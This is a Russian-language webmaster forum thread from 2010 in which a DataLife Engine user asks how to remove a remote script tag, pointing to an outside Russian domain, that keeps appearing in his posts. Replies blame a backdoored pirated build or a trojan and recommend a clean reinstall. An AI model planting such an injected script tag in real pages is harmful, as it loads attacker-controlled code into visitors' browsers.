Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > DataLife Engine
Расширенный поиск

DataLife Engine Скачать хаки для DLE, темы для DLE

Ответ
 
Опции темы Поиск в этой теме
Старый 26.09.2010, 11:38 Вверх   #1
Местный житель
 
Аватар для efr07
efr07 вне форума
Доп. информация
По умолчанию При добавлении новости добавляется код левого скрипта. Как это убрать ?

Я добавляю новость а когда допустим захожу её редактировать в полной и короткой новости добавляется строчка <script src="http://tvoyatajna.msk.ru/injs.820cee7448076a85c6b791f82a6adcfc/" type="text/javascript"></script> ! ъ

что делать ? как от этого избавиться ?
  Ответить с цитированием
Старый 26.09.2010, 13:54 Вверх   #2
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.
  Ответить с цитированием
Старый 26.09.2010, 14:20 Вверх   #3
Местный житель
 
Аватар для efr07
efr07 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
efr07, самый простой способ - это взять нормальный движок DLE и поставить. Я уже кажется писал о прелестях говносборок и т.п. Некоторые особо умные личности писали что это круто и что там уже все собрано и делать ничего не надо )).

Я думаю что данный скрипт - это только одно из многих что ты нашел. Как на счет блэкдора и т.п. ? Мой совет - выбрасывай этот скрипт.

А если не хочешь то придется искать скрипт либо в базе, либо в файлах. Где точно сказать нельзя или можно спросить у автора сего детища.
так раньше такого не было ! только щас появилось !
  Ответить с цитированием
Старый 26.09.2010, 19:59 Вверх   #4
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от efr07 Посмотреть сообщение
так раньше такого не было ! только щас появилось !
Тогда есть 2 варианта. Либо код был добавлен заранее, что мало вероятно, либо есть в движке блэкдур, через который могли зайти к тебе в гости и наградить такой гадостью. Я помню сборки от MID Team славились такими штучками.

Угадать на 100% откуда это взялось - нельзя, но дыра где то есть - это однозначно. У меня форум 2 раза турки взламывали, я репу чесал, думал как, перерыл немеренно инфы. А оказалось ломали через DLE, который лежал в соседней папке с форумом.
  Ответить с цитированием
Старый 27.09.2010, 01:07 Вверх   #5
Fedoraвод
 
Аватар для Злой
Злой вне форума
Доп. информация
По умолчанию

Не стоит исключать возможность присутствия на компе трояна, который добавляет во все POST запросы свои ссылочки ))
Винда форева!
Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))
  Ответить с цитированием
Старый 27.09.2010, 01:20 Вверх   #6
Знаток
 
Аватар для tanka1380
tanka1380 вне форума
Доп. информация
По умолчанию

Впервые обнаружил такое пару месяцев назад, когда одна юзерша одного из моих сайтов начала постить вполне приличные коментарии со ссылка на всякие какашечные сайты ))
У меня такое тоже было. Хостер помог избавиться. Торян влез через разрешенные жи-эсы в личке на треккере. А треккер в соседней папке на фтп.
--------------------------------------------------------------------
кстати. До сих пор есть остаточек от галеры, "Цезарь" называется. Никак не удалить из админки. Вроде и не мешает, а вот, что-то не совсем спокойно.

Последний раз редактировалось tanka1380; 27.09.2010 в 01:24..
  Ответить с цитированием
Старый 27.09.2010, 10:40 Вверх   #7
Грамотный форумчанин
 
Аватар для cassper
cassper вне форума
Доп. информация
По умолчанию

Оффтоп
  Ответить с цитированием
Cказали cпасибо:
Старый 27.09.2010, 17:33 Вверх   #8
S.T.A.L.K.E.R.
 
Аватар для Stalker
Stalker вне форума
Доп. информация
По умолчанию

100-пудово троян, у меня тоже такое было. Перелопатил ручками весь код. На хосте всё снёс и заного залил чистый код.

ЗЫ: правда не в дле. В Дле много файлов задействованно для добавлеия новости. Ручками тяжело будет...

Последний раз редактировалось Stalker; 27.09.2010 в 17:47..
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Видеоурок по установке и обновлению скрипта форума vBulletin Serberg Инструкции по vBulletin 11 06.01.2012 02:34
[Статья] Хаки для оптимизации работы скрипта и его отладки Serberg Хаки для vBulletin 1 22.07.2009 23:53
Фиксы скрипта vBulletin Serberg vBulletin 3.х 0 14.07.2008 16:05
Производительность и оптимизация скрипта vBulletin [FAQ] Serberg Инструкции по vBulletin 1 09.03.2008 22:57


Текущее время: 22:24. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.10577 секунды с 14 запросами